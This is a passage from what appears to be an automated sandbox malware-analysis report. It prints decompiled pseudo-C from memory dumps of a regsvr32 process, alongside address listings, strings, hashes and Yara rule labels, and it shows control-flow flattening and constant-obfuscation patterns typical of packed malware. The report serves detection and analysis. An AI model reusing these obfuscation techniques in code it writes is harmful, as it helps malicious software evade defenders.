									_v16 = _v16 ^ 0x00667865;
									_v24 = 0xaeb38a;
									_v24 = _v24 >> 2;
									_v24 = _v24 ^ 0x2a8a4fb7;
									_t195 = 0x41;
									_v24 = _v24 / _t195;
									_v24 = _v24 ^ 0x00add68a;
									_t179 = E003CDACA( *(_t218 + 0x44), _v28, _v16, _v24);
									_t227 =  &(_t227[2]);
									 *(_t218 + 8) = _t179;
									__eflags = _t179;
									_t171 = 0x6492d;
									_t221 =  !=  ? 0x6492d : 0x63bb8;
									continue;
								} else {
									if(_t221 == 0xaf3ff) {
										_v24 = 0x68cb4a;
										_v24 = _v24 ^ 0x2c40a3f4;
										_t197 = 0x43;
										_push(_t197);
										_v24 = _v24 / _t197;
										_v24 = _v24 << 4;
										_v24 = _v24 ^ 0x0a807e2c;
										_v20 = 0xa3ad21;
										_v20 = _v20 + 0x6a6b;
										_v20 = _v20 ^ 0x00aa5dce;
										_v28 = 0xaa4b86;
										_v28 = _v28 << 0x10;
										_v28 = _v28 << 7;
										_v28 = _v28 + 0xffff4b59;
										_v28 = _v28 ^ 0xc2f0f1d6;
										_push(_v28);
										_push(_v20);
										_t171 = E003DDC64(_t188, _v24, __eflags);
										_t229 =  &(_t227[3]);
										 *(_t218 + 0x44) = _t171;
										__eflags = _t171;
										if(_t171 != 0) {
											_v24 = 0x612c24;
											_v24 = _v24 | 0xddf20a4a;
											_v24 = _v24 ^ 0xddf19785;
											_v20 = 0xd8f5b1;
											_v20 = _v20 * 0x6b;
											_v20 = _v20 ^ 0x5aace458;
											E003C780A( *(_t218 + 0x44),  *(_t218 + 0x44), _v24, _v20);
											_v16 = 0x3475e;
											_v16 = _v16 + 0xffff0c30;
											_v16 = _v16 ^ 0x000f800d;
											_v20 = 0x9903b2;
											_t200 = 0x66;
											_v20 = _v20 / _t200;
											_v20 = _v20 ^ 0x000a9ec9;
											_v24 = 0x16959e;
											_v24 = _v24 >> 7;
											_v24 = _v24 ^ 0xa9969c8b;
											_v24 = _v24 | 0xc2071f4e;
											_v24 = _v24 ^ 0xeb90605a;
											_v28 = 0x1af4d8;
											_v28 = _v28 << 5;
											_v28 = _v28 ^ 0x69bf6a51;
											_v28 = _v28 ^ 0x6aea9d42;
											E003E06E7(_v16, _v20, _v24,  *(_t218 + 0x44), _v28);
											_t227 =  &(_t229[5]);
											_t221 = 0xa24b6;
											while(1) {
												L1:
												_t171 = 0x6492d;
												goto L2;
											}
										}
									} else {
										if(_t221 != 0xf2e87) {
											goto L14;
										} else {
											_t221 = 0xaf3ff;
											continue;
										}
									}
								}
							}
							goto L15;
						}
						_v20 = 0x38448a;
						_v20 = _v20 * 0x59;
						_v20 = _v20 ^ 0x138657a1;
						_v24 = 0x77da8f;
						_v24 = _v24 ^ 0x26f75919;
						_v24 = _v24 << 0xd;
						_v24 = _v24 ^ 0x107117db;
						_v16 = 0x235629;
						_v16 = _v16 << 7;
						_t165 =  &_v16;
						 *_t165 = _v16 ^ 0x11ae5478;
						__eflags =  *_t165;
						E003C5CF1(_v20, _v24,  *(_t218 + 0x44), _v16);
						_t221 = 0xb044e;
						_t171 = 0x6492d;
						L14:
						__eflags = _t221 - 0xb044e;
					} while (__eflags != 0);
					L15:
					return _t171;
				}
			}

0x003d7ca5
0x003d7ca8
0x003d7cad
0x003d7cb6
0x003d7cb8
0x003d7cc0
0x003d7cc2
0x003d7ccc
0x003d7ccc
0x003d7ccc
0x003d7cd1
0x00000000
0x003d7cd1
0x003d7cdb
0x003d7ef9
0x003d7f03
0x003d7f0b
0x003d7f13
0x003d7f1b
0x003d7f23
0x003d7f27
0x003d7f2f
0x003d7f37
0x003d7f3f
0x003d7f4d
0x003d7f55
0x003d7f59
0x003d7f61
0x003d7f6e
0x003d7f72
0x003d7f7a
0x003d7f7e
0x003d7f85
0x003d7f89
0x003d7f8d
0x003d7f8e
0x003d7f93
0x003d7f96
0x003d7f99
0x003d7f9b
0x003d7f9d
0x00000000
0x003d7f9d
0x003d7ce1
0x003d7ce7
0x003d7e71
0x003d7e7b
0x003d7e7f
0x003d7e84
0x003d7e8c
0x003d7e94
0x003d7e9c
0x003d7ea4
0x003d7eac
0x003d7eb1
0x003d7ebf
0x003d7ec2
0x003d7ec6
0x003d7edd
0x003d7ee2
0x003d7ee5
0x003d7ee8
0x003d7eec
0x003d7ef1
0x00000000
0x003d7ced
0x003d7cf3
0x003d7d08
0x003d7d12
0x003d7d20
0x003d7d23
0x003d7d24
0x003d7d2a
0x003d7d2f
0x003d7d37
0x003d7d3f
0x003d7d47
0x003d7d4f
0x003d7d57
0x003d7d5c
0x003d7d61
0x003d7d69
0x003d7d71
0x003d7d75
0x003d7d7d
0x003d7d82
0x003d7d85
0x003d7d88
0x003d7d8a
0x003d7d90
0x003d7d98
0x003d7da0
0x003d7da8
0x003d7db5
0x003d7db9
0x003d7dce
0x003d7dd3
0x003d7ddd
0x003d7de5
0x003d7ded
0x003d7dfb
0x003d7dfe
0x003d7e02
0x003d7e0a
0x003d7e12
0x003d7e17
0x003d7e1f
0x003d7e27
0x003d7e2f
0x003d7e37
0x003d7e3c
0x003d7e44
0x003d7e5f
0x003d7e64
0x003d7e67
0x003d7ccc
0x003d7ccc
0x003d7ccc
0x00000000
0x003d7ccc
0x003d7ccc
0x003d7cf5
0x003d7cfb
0x00000000
0x003d7d01
0x003d7d01
0x00000000
0x003d7d01
0x003d7cfb
0x003d7cf3
0x003d7ce7
0x00000000
0x003d7cdb
0x003d7fa4
0x003d7fb1
0x003d7fb5
0x003d7fbd
0x003d7fc5
0x003d7fcd
0x003d7fd2
0x003d7fda
0x003d7fe2
0x003d7fe7
0x003d7fe7
0x003d7fe7
0x003d7ffe
0x003d8005
0x003d800a
0x003d800f
0x003d800f
0x003d800f
0x003d801b
0x003d8022
0x003d8022

Strings

$,a, xrefs: 003D7D90
)V#, xrefs: 003D7FDA

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $,a$)V#
API String ID: 0-619223015
Opcode ID: c63d2ba30539950dfc8fbfd13e56d7394525751cb5ece4e2ce82bf49cecd0061
Instruction ID: c7c31a67db280f433d2692fbf114ccc36423e5c1acf721a03d29a8eed69d6a41
Opcode Fuzzy Hash: c63d2ba30539950dfc8fbfd13e56d7394525751cb5ece4e2ce82bf49cecd0061
Instruction Fuzzy Hash: 1E9161728083029FC309CF25E54950BBAE1BBD4B44F004A2DF496AA220D7B5CA1DCFD3

Uniqueness

Uniqueness Score: -1.00%

Function 10017A8D Relevance: 2.7, Strings: 2, Instructions: 176
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10017A8D(signed short* __ecx, signed short* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed short* _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				char _v48;
				signed short _t82;
				signed int _t83;
				signed int _t84;
				void* _t86;
				signed short* _t93;
				intOrPtr* _t97;
				signed short* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t108;
				signed int _t109;
				signed int _t112;
				signed short* _t114;
				signed int _t118;
				unsigned int _t119;
				signed short _t124;
				signed short _t136;
				signed int _t137;
				signed int _t148;
				signed int _t150;
				signed int _t151;
				unsigned int _t158;

				_t114 = __ecx;
				_t102 = 0;
				_v24 = __ecx;
				if(__ecx[4] == 0) {
					_v28 = 0;
					_v36 =  *__ecx;
					_t82 = __ecx[2];
					_v32 = _t82;
					if(_t82 != 0 ||  *__ecx != 0) {
						if(_a8 != _t102) {
							if(_t82 != 0x80000000 ||  *_t114 != _t102 || _a8 != 1) {
								if(_t82 < _t102) {
									E100177DF( &_v36, E10017A43( &_v36,  &_v48));
								}
								_t83 = E1001CC02(_a8);
								_t137 = _v32;
								if(_t137 == _t102) {
									L24:
									_t84 = _t83 & 0x0000ffff;
									_t148 = _v36 >> 0x00000010 & 0x0000ffff;
									_t103 = _t83 >> 0x00000010 & 0x0000ffff;
									_v12 = _t103;
									_t158 = _t84 * _t148;
									_t118 = _v36 & 0x0000ffff;
									_v20 = _t148 * _t103;
									_v8 = _t118;
									_t150 = _t137 & 0x0000ffff;
									_t119 = _t118 * _t103;
									_t151 = _t150 * _v12;
									_v12 = (_t137 >> 0x10) * _t84;
									_v32 = _v32 & 0x00000000;
									_v16 = _t150 * _t84;
									_t86 = _t84 * _v8 + (_t119 << 0x10);
									_t108 = (_t158 << 0x10) + _t86;
									_v36 = _t108;
									if(_t86 < _t119 << 0x10) {
										_v32 = 1;
									}
									if(_t108 < _t86) {
										_v32 = _v32 + 1;
									}
									_v32 = _v32 + (_t119 >> 0x10) + (_t158 >> 0x10) + _v16 + (_v12 + _t151 << 0x10) + _v20;
									if((( *(_v24 + 4) ^ _a8) & 0x80000000) != 0) {
										E100177DF( &_v36, E10017A43( &_v36,  &_v48));
										_t108 = _v36;
									}
									_t93 = _a4;
									 *_t93 = _t108;
									_t93[2] = _v32;
									_t124 = _v28;
									L31:
									_t93[4] = _t124;
									return _t93;
								} else {
									_v12 = 0x20;
									if((0x80000000 & _t137) != 0) {
										L17:
										if(_t83 == _t102) {
											_v8 = _t102;
											L22:
											if((_v8 & 0x0000ffff) + (_v12 & 0x0000ffff) - 1 <= 0x3f) {
												goto L24;
											}
											_t97 = _a4;
											 *_t97 = 0;
											 *((intOrPtr*)(_t97 + 4)) = 0x80000000;
											 *((intOrPtr*)(_t97 + 8)) = 1;
											return _t97;
										}
										_v8 = 0x20;
										if((0x80000000 & _t83) != 0) {
											goto L22;
										} else {
											goto L19;
										}
										do {
											L19:
											_v8 = _v8 + 0xffff;
											_t109 = 1;
										} while ((_t83 & _t109 << _v8 - 0x00000001) == 0);
										goto L22;
									} else {
										goto L15;
									}
									do {
										L15:
										_v12 = _v12 + 0xffff;
										_t112 = 1;
									} while ((_t137 & _t112 << _v12 - 0x00000001) == 0);
									_t102 = 0;
									goto L17;
								}
							} else {
								_t101 = _a4;
								 *_t101 =  *_t114;
								_t136 = _t114[2];
								goto L10;
							}
						}
						goto L5;
					} else {
						L5:
						_t101 = _a4;
						_t136 = 0;
						 *_t101 = 0;
						L10:
						_t101[2] = _t136;
						_t101[4] = _t102;
						return _t101;
					}
				}
				_t93 = _a4;
				 *_t93 =  *__ecx;
				_t93[2] = __ecx[2];
				_t124 = __ecx[4];
				goto L31;
			}

0x10017a8d
0x10017a94
0x10017a9b
0x10017a9e
0x10017ab7
0x10017aba
0x10017abd
0x10017ac2
0x10017ac5
0x10017ace
0x10017ae2
0x10017b05
0x10017b17
0x10017b17
0x10017b1f
0x10017b24
0x10017b2a
0x10017b9b
0x10017ba3
0x10017ba9
0x10017bac
0x10017bb1
0x10017bb4
0x10017bba
0x10017bbe
0x10017bc1
0x10017bc4
0x10017bc7
0x10017bd2
0x10017bdd
0x10017be2
0x10017be6
0x10017bec
0x10017bf8
0x10017bfc
0x10017bff
0x10017c01
0x10017c01
0x10017c0a
0x10017c0c
0x10017c0c
0x10017c30
0x10017c38
0x10017c4a
0x10017c4f
0x10017c4f
0x10017c52
0x10017c58
0x10017c5a
0x10017c5d
0x10017c60
0x10017c60
0x00000000
0x10017b2c
0x10017b2e
0x10017b3a
0x10017b4e
0x10017b50
0x10017b71
0x10017b74
0x10017b83
0x00000000
0x00000000
0x10017b85
0x10017b8a
0x10017b8c
0x10017b8f
0x00000000
0x10017b8f
0x10017b54
0x10017b5b
0x00000000
0x00000000
0x00000000
0x00000000
0x10017b5d
0x10017b5d
0x10017b5d
0x10017b65
0x10017b69
0x00000000
0x00000000
0x00000000
0x00000000
0x10017b3c
0x10017b3c
0x10017b3c
0x10017b44
0x10017b48
0x10017b4c
0x00000000
0x10017b4c
0x10017aee
0x10017aee
0x10017af3
0x10017af5
0x00000000
0x10017af5
0x10017ae2
0x00000000
0x10017ad0
0x10017ad0
0x10017ad0
0x10017ad3
0x10017ad7
0x10017af8
0x10017af8
0x10017afb
0x00000000
0x10017afb
0x10017ac5
0x10017aa0
0x10017aa5
0x10017aaa
0x10017aad
0x00000000

Strings

, xrefs: 10017B2E
, xrefs: 10017B54

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 1e4b147602f2d2a2d0c8d55675da14cdcd09b53c1ea6b7a3b0d9f85d93fa2b15
Instruction ID: 68ac56111acba52413a9f2de60732bb35d0def3031637ed7dd0e45651a0aa266
Opcode Fuzzy Hash: 1e4b147602f2d2a2d0c8d55675da14cdcd09b53c1ea6b7a3b0d9f85d93fa2b15
Instruction Fuzzy Hash: 2C612A75E042199FCB08CF99C4D46AEBBF5FF88254F21806ED909AB351D735DA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003DF6AE Relevance: 2.6, Strings: 2, Instructions: 148
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003DF6AE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t121;
				void* _t123;
				void* _t132;
				void* _t143;
				void* _t144;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t152;
				signed int _t154;
				void* _t171;
				signed int* _t174;

				_t170 = _a8;
				_t144 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t121);
				_t174 =  &(( &_v68)[4]);
				_v56 = 0x7e402;
				_t171 = 0;
				_t123 = 0x8fc56;
				while(_t123 != 0x2c581) {
					if(_t123 == 0x8fc56) {
						_t123 = 0xc3b9e;
						continue;
					} else {
						if(_t123 == 0xc3b9e) {
							_v68 = 0xd4aba1;
							_v68 = _v68 >> 0xb;
							_v68 = _v68 ^ 0x00030f76;
							_v64 = 0x7e1b69;
							_v64 = _v64 << 0xf;
							_v64 = _v64 ^ 0x0db28390;
							_v56 = 0x77122c;
							_v56 = _v56 + 0x2f7c;
							_v56 = _v56 ^ 0x0079e9d9;
							_v60 = 0x90a14a;
							_t152 = 0xf;
							_v60 = _v60 / _t152;
							_v60 = _v60 ^ 0x0003d25c;
							E003CAE19( &_v52, _v68, _t144, _v64, _v56, _v60);
							_t174 =  &(_t174[4]);
							_t123 = 0xf69d4;
							continue;
						} else {
							_t179 = _t123 - 0xf69d4;
							if(_t123 != 0xf69d4) {
								L10:
								__eflags = _t123 - 0x58c66;
								if(__eflags != 0) {
									continue;
								}
							} else {
								_v68 = 0x49a86e;
								_v68 = _v68 + 0xffff6f3f;
								_t154 = 0x62;
								_v68 = _v68 * 0x44;
								_v68 = _v68 + 0x4fd0;
								_v68 = _v68 ^ 0x1360a18b;
								_v56 = 0x82a123;
								_v56 = _v56 / _t154;
								_v56 = _v56 + 0xffff7632;
								_v56 = _v56 ^ 0x000ed92d;
								_v60 = 0x94a44d;
								_v60 = _v60 ^ 0x356fe5c9;
								_v60 = _v60 >> 0xb;
								_v60 = _v60 ^ 0x0009b6e4;
								_v64 = 0xc37a32;
								_v64 = _v64 >> 7;
								_v64 = _v64 + 0x9996;
								_v64 = _v64 ^ 0x000035ea;
								_t143 = E003D833B(_v68, _v56, _t179, _v60, _v64,  &_v52, _t170 + 8);
								_t174 =  &(_t174[4]);
								if(_t143 != 0) {
									_t123 = 0x2c581;
									continue;
								}
							}
						}
					}
					return _t171;
				}
				_v60 = 0x79fcdc;
				_t146 = 0x12;
				_v60 = _v60 / _t146;
				_v60 = _v60 + 0x4c27;
				_v60 = _v60 ^ 0x0004b9a8;
				_v64 = 0x681715;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 ^ 0x0003da32;
				_v68 = 0x7c90fb;
				_t147 = 0x52;
				_v68 = _v68 / _t147;
				_v68 = _v68 | 0xb534f304;
				_t148 = 0x5b;
				_v68 = _v68 / _t148;
				_v68 = _v68 ^ 0x01f30988;
				_v56 = 0xba78d;
				_v56 = _v56 ^ 0xd186905c;
				_v56 = _v56 + 0x15d8;
				_v56 = _v56 ^ 0xd1876d26;
				_t132 = E003D833B(_v60, _v64, __eflags, _v68, _v56,  &_v52, _t170 + 0x24);
				_t174 =  &(_t174[4]);
				__eflags = _t132;
				_t123 = 0x58c66;
				_t171 =  !=  ? 1 : _t171;
				goto L10;
			}

0x003df6b5
0x003df6b9
0x003df6bb
0x003df6bc
0x003df6c0
0x003df6c1
0x003df6c2
0x003df6c7
0x003df6ca
0x003df6d2
0x003df6d4
0x003df6de
0x003df6eb
0x003df851
0x00000000
0x003df6f1
0x003df6f6
0x003df7c1
0x003df7cb
0x003df7d0
0x003df7d8
0x003df7e0
0x003df7e5
0x003df7ed
0x003df7fd
0x003df805
0x003df80d
0x003df81b
0x003df822
0x003df826
0x003df83f
0x003df844
0x003df847
0x00000000
0x003df6fc
0x003df6fc
0x003df701
0x003df91b
0x003df91b
0x003df920
0x00000000
0x00000000
0x003df707
0x003df707
0x003df711
0x003df720
0x003df721
0x003df725
0x003df72d
0x003df735
0x003df743
0x003df74a
0x003df752
0x003df75a
0x003df762
0x003df76a
0x003df76f
0x003df777
0x003df77f
0x003df784
0x003df78c
0x003df7aa
0x003df7af
0x003df7b4
0x003df7ba
0x00000000
0x003df7ba
0x003df7b4
0x003df701
0x003df6f6
0x003df92f
0x003df92f
0x003df85b
0x003df86b
0x003df870
0x003df876
0x003df87e
0x003df886
0x003df88e
0x003df893
0x003df89b
0x003df8a7
0x003df8ac
0x003df8b2
0x003df8be
0x003df8c1
0x003df8c8
0x003df8d0
0x003df8d8
0x003df8e0
0x003df8e8
0x003df906
0x003df90d
0x003df911
0x003df913
0x003df918
0x00000000

Strings

5, xrefs: 003DF78C
'L, xrefs: 003DF876

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 'L$5
API String ID: 0-2624284458
Opcode ID: 0e7117e93987f0be5a6d250997757c242e2da43ecc22f32f44fc2a42d5112ddf
Instruction ID: 9c7ece29d51f6fe83da593d0c47ab62c6db52233df01e98f8c499305b2bb1f4f
Opcode Fuzzy Hash: 0e7117e93987f0be5a6d250997757c242e2da43ecc22f32f44fc2a42d5112ddf
Instruction Fuzzy Hash: 7C5147B15083028FD305CF25E88981BBBE5FBD4744F00892EF59696221D7B9DA1E8F83

Uniqueness

Uniqueness Score: -1.00%

Function 003DA1B1 Relevance: 2.6, Strings: 2, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003DA1B1(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t97;
				void* _t99;
				void* _t108;
				intOrPtr _t113;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr* _t133;
				void* _t134;
				signed int* _t137;

				_t116 = _a8;
				_push(_a8);
				_push(_a4);
				_t133 = __ecx;
				_push(__edx);
				_push(__ecx);
				E003C2528(_t97);
				_t137 =  &(( &_v60)[4]);
				_v40 = 0x222a5;
				_t134 = 0;
				_t99 = 0x7410;
				do {
					while(_t99 != 0x7410) {
						if(_t99 == 0xbbbe0) {
							_v52 = 0x6de988;
							_t118 = 0x6b;
							_v52 = _v52 * 0x7d;
							_t119 = 0x5a;
							_v52 = _v52 / _t118;
							_v52 = _v52 ^ 0x0081836f;
							_v56 = 0x64ec53;
							_t69 =  &_v56; // 0x64ec53
							_v56 =  *_t69 * 0xa;
							_v56 = _v56 >> 9;
							_v56 = _v56 ^ 0x00020eb0;
							_v48 = 0xb7ea7c;
							_v48 = _v48 / _t119;
							_v48 = _v48 ^ 0x00087d63;
							_v60 = 0xea511e;
							_v60 = _v60 ^ 0xeac0750a;
							_v60 = _v60 + 0xffffe142;
							_v60 = _v60 ^ 0xea254cc0;
							_t108 = E003CEC5D(_v52, _v56, _v48, _v60,  *((intOrPtr*)(_t116 + 4)),  &_v36,  *_t116);
							_t137 =  &(_t137[6]);
							if(_t108 != 0) {
								_t99 = 0xd1a87;
								continue;
							}
						} else {
							if(_t99 != 0xd1a87) {
								goto L9;
							} else {
								_v48 = 0x2b0331;
								_v48 = _v48 ^ 0xbc507529;
								_t120 = 0x13;
								_v48 = _v48 * 0x77;
								_v48 = _v48 ^ 0x9d64733a;
								_v56 = 0x9cfb68;
								_v56 = _v56 >> 6;
								_v56 = _v56 + 0x2fa8;
								_v56 = _v56 ^ 0x000194db;
								_v60 = 0x938993;
								_v60 = _v60 ^ 0xdbb2af07;
								_v60 = _v60 * 0x67;
								_v60 = _v60 | 0x43222af8;
								_v60 = _v60 ^ 0x6b7fafa3;
								_v40 = 0xe09dd6;
								_v40 = _v40 + 0xffff803c;
								_v40 = _v40 ^ 0x00e61439;
								_v44 = 0x717346;
								_v44 = _v44 / _t120;
								_v44 = _v44 ^ 0x0009adaa;
								_v52 = 0xb952f6;
								_v52 = _v52 | 0x1023ee6f;
								_v52 = _v52 ^ 0x5bc64cdf;
								_v52 = _v52 ^ 0x4b7741a5;
								_t113 =  *0x3e221c; // 0x0
								E003DA043( *_t133,  *((intOrPtr*)(_t133 + 4)), _t120, _t120, _v48, _v56, _t120,  &_v36,  *((intOrPtr*)(_t113 + 0x60)), _v60, _v40, _v44, _v52);
								_t134 =  ==  ? 1 : _t134;
							}
						}
						L5:
						return _t134;
					}
					_t99 = 0xbbbe0;
					L9:
				} while (_t99 != 0xc2678);
				goto L5;
			}

0x003da1b5
0x003da1bc
0x003da1bd
0x003da1c1
0x003da1c3
0x003da1c4
0x003da1c5
0x003da1ca
0x003da1cd
0x003da1d5
0x003da1d7
0x003da1e1
0x003da1e1
0x003da1ee
0x003da304
0x003da315
0x003da318
0x003da322
0x003da323
0x003da329
0x003da331
0x003da339
0x003da33e
0x003da342
0x003da347
0x003da34f
0x003da35d
0x003da365
0x003da36d
0x003da375
0x003da37d
0x003da385
0x003da3a3
0x003da3a8
0x003da3ad
0x003da3b3
0x00000000
0x003da3b3
0x003da1f4
0x003da1f9
0x00000000
0x003da1ff
0x003da1ff
0x003da209
0x003da218
0x003da219
0x003da21d
0x003da225
0x003da22d
0x003da232
0x003da23a
0x003da242
0x003da24a
0x003da257
0x003da25b
0x003da263
0x003da26b
0x003da273
0x003da27b
0x003da283
0x003da291
0x003da295
0x003da29d
0x003da2a5
0x003da2ad
0x003da2b5
0x003da2cd
0x003da2ea
0x003da2f7
0x003da2f7
0x003da1f9
0x003da2fb
0x003da303
0x003da303
0x003da3bd
0x003da3bf
0x003da3bf
0x00000000

Strings

Sd, xrefs: 003DA339
Fsq, xrefs: 003DA283

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Fsq$Sd
API String ID: 0-2607107075
Opcode ID: b2cc0b6fd2420d30182cb51f81dacedb2d0bace470054bd7d74b491fd802d37d
Instruction ID: 5f446add11d7ece6f069b15296ddb163598c577ddc4bb31f7fbdab96768bae28
Opcode Fuzzy Hash: b2cc0b6fd2420d30182cb51f81dacedb2d0bace470054bd7d74b491fd802d37d
Instruction Fuzzy Hash: E55166725083029FD709CF25E94681BBBE6FBC8744F108E1EF49596260D3B5DA598F83

Uniqueness

Uniqueness Score: -1.00%

Function 003C4949 Relevance: 2.6, Strings: 2, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E003C4949() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				void* _t90;
				intOrPtr _t93;
				signed int _t98;
				signed int _t111;
				short* _t113;
				signed int* _t119;

				_t119 =  &_v544;
				_v524 = _v524 & 0x00000000;
				_t90 = 0xb5a6a;
				_t113 = _v536;
				_v532 = 0x12469;
				_v528 = 0x89806;
				L1:
				while(_t90 != 0x2e7a0) {
					if(_t90 == 0xb5a6a) {
						_t90 = 0xb94dc;
						continue;
					} else {
						if(_t90 == 0xb94dc) {
							_v544 = 0xecab54;
							_v544 = _v544 >> 4;
							_v544 = _v544 | 0xbe2c652a;
							_v544 = _v544 + 0xffffa179;
							_v544 = _v544 ^ 0xbe2c3f0c;
							_v536 = 0x4398a;
							_v536 = _v536 ^ 0x9938822e;
							_v536 = _v536 ^ 0x99398539;
							_v540 = 0x3a42cc;
							_v540 = _v540 + 0x473f;
							_v540 = _v540 ^ 0x7e572627;
							_v540 = _v540 ^ 0x7e666b1f;
							E003C2493(_t103,  &_v520, _v544, _v536, _v540);
							_t119 =  &(_t119[3]);
							_t90 = 0xcb53d;
							continue;
						} else {
							if(_t90 == 0xcb53d) {
								_v540 = 0x8222b8;
								_v540 = _v540 + 0xffffb865;
								_v540 = _v540 ^ 0x0081db1f;
								_t111 = _v540;
								_v536 = 0x8ad418;
								_v536 = _v536 ^ 0x22185c73;
								_v536 = _v536 ^ 0x2294574e;
								_v540 = 0x86c42;
								_v540 = _v540 | 0xf2289142;
								_v540 = _v540 ^ 0xf22f8ace;
								_v544 = 0xdcca90;
								_v544 = _v544 + 0xffffffe9;
								_v544 = _v544 ^ 0xb93957b2;
								_v544 = _v544 + 0xb38e;
								_v544 = _v544 ^ 0xb9ebb9fd;
								_t98 = E003CB10B(_v536, _v540, _v544,  &_v520);
								_pop(_t103);
								_t113 =  &_v520 + _t98 * 2;
								while(_t113 >  &_v520) {
									if( *_t113 != 0x5c) {
										L8:
										_t113 = _t113 - 2;
										continue;
									} else {
										_t111 = _t111 - 1;
										if(_t111 == 0) {
											_t113 = _t113 + 2;
										} else {
											goto L8;
										}
									}
									L12:
									_t90 = 0x2e7a0;
									goto L1;
								}
								goto L12;
							}
						}
					}
					L16:
					if(_t90 != 0x2b249) {
						continue;
					}
					return _t90;
				}
				_v540 = 0xfd78ce;
				_v540 = _v540 + 0x1a9c;
				_v540 = _v540 + 0xffff8ed6;
				_v540 = _v540 << 0xd;
				_v540 = _v540 ^ 0xa44e129d;
				_v544 = 0x6d9ed9;
				_v544 = _v544 + 0x8541;
				_v544 = _v544 * 0x3a;
				_v544 = _v544 * 0x36;
				_v544 = _v544 ^ 0x438ac5c4;
				_v536 = 0x546b21;
				_v536 = _v536 + 0xffff541a;
				_v536 = _v536 ^ 0x00577cef;
				_t93 =  *0x3e2208; // 0x28e510
				_t103 = _v540;
				E003C2529(_v540, _t113, _t93 + 0x22c, _v544, _v536);
				_t119 =  &(_t119[3]);
				_t90 = 0x2b249;
				goto L16;
			}

0x003c4949
0x003c494f
0x003c4954
0x003c495c
0x003c4965
0x003c4973
